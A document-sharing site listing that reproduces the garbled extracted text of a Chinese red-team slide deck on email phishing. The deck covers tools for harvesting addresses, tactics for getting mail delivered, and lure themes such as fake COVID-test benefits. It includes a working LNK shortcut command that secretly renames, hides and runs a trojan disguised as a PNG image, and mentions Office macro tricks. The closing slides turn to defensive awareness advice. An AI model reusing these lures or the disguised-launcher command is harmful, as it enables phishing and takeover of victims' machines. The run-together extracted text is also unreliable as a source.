3vilK4li：攻防实战—邮件钓鱼实践（35页）.pdf

《3vilK4li：攻防实战—邮件钓鱼实践（35页）.pdf》由会员分享，可在线阅读，更多相关《3vilK4li：攻防实战—邮件钓鱼实践（35页）.pdf（35页珍藏版）》请在三个皮匠报告上搜索。

1、3vilK4li斗象科技-高级安全服务工程师网安漏洞研究员攻防钓手常见的邮箱收集工具https:/app.snov.io/domain-searchhttp:/ 顶级域名惹的祸！为什么我的邮件还是被拒收？https:/www.mail- or wps）下载文件文件运行获取主机权限几个重要的文案设计方向公司事务时事热点用户利益诱惑：一封掉钱的邮件！几个重要的文案设计方向公司事务时事热点用户利益核酸检测的福利到底要不要让受害者回邮件呢？增加邮件内容的真实性更加符合现代办公的要求受害者可能提高警惕通知类的邮件操作显得多余几个重要的文案设计方向公司事务时事热点用户利益一封完整却又不完整的邮件！时间魔术

2、容易忽略的几点发件时间惰性心理发件内容合理性暗示性动词企业签名压缩包的秘密（EXE）#includevoid main(int argc,char*argv)printf(%sn,argv0);getchar();压缩包的秘密（LNK）C:WindowsSystem32cmd.exe/c dir C:UsersadminDesktopshowCurrentPath123.txt&pauseLnk 双击“图片”也能上线%windir%system32cmd.exe/c if exist“flag.png”(ren flag.png flag.exe&attrib+s+h flag.exe&sta

3、rt flag.exe&ren flag.exe flag.png)else(msg%username%/time:10 该文件不支持压缩包预览，请解压后查看)Lnk 双击“图片”也能上线压缩包1.png.LnkRenameflag.png(exe)flag.exe隐藏flag.exe执行flag.exe执行木马&上线释放&打开(real)flag.png1.pngLnk提示：不支持压缩包内预览，请解压后查看重命名（png）Office Macro批注也疯狂https:/ 邮件标题 正文措辞 正文签名两戒备：正文链接 邮件附件两个稳妥！操作要稳安装杀毒软件不在非官方站点输入账号密码确认链接来源做好登录辅助认证心态要稳沉着冷静及时上报梳理经过防患未然三个开展定期开展安全意识培训定期印发防钓鱼宣传海报定期开展内部钓鱼实战演练